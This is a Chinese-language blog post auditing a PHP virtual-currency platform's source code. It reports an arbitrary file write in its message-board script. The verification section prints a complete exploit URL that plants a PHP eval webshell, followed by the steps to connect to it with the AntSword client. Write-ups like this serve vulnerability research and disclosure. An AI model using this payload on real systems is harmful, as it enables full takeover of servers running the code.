某虚拟币程序代码审计
0x0 前言:
没事闲得慌就想在gayhub搜点php源码审一审,搜到一个虚拟币平台的源码。
源码奉上: https://github.com/maole01/otc
0x1 整理思路:
一般来说这种站都是挖的SQL注入之类的,如果用的是TP框架的话 也可以看看日志文件路径。不过这次挖到的是一个任意文件写入,可以直接getshell。
为了祖国繁荣富强,紧跟党走,打击非法集资,非法运营,传销骗钱…emmmmm
0x2 漏洞描述 :
首先祭起法师大大的源代码审计工具,正则匹配来一波,发现有个文件有点问题
打开一看 果然有点问题
首先呢,是通过GET传递过来数据 后面呢定义一个数组 把数据加到里面 接着呢就是定义一下路径 以及 文件名。
这个地方就写出来了,把获取到的数据保存起来(简直写的像一个后门)
0x2 漏洞验证:
本地验证
先访问:/gw/3/MessageBoard.php?type=123&name=123&email=123@qq.com&subject=123123&message="}]<?php @eval($_POST['x']);?>//123
后访问:/gw/3/saveMessageBoardData.php
用蚁剑连接 密码 x
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Caps!
评论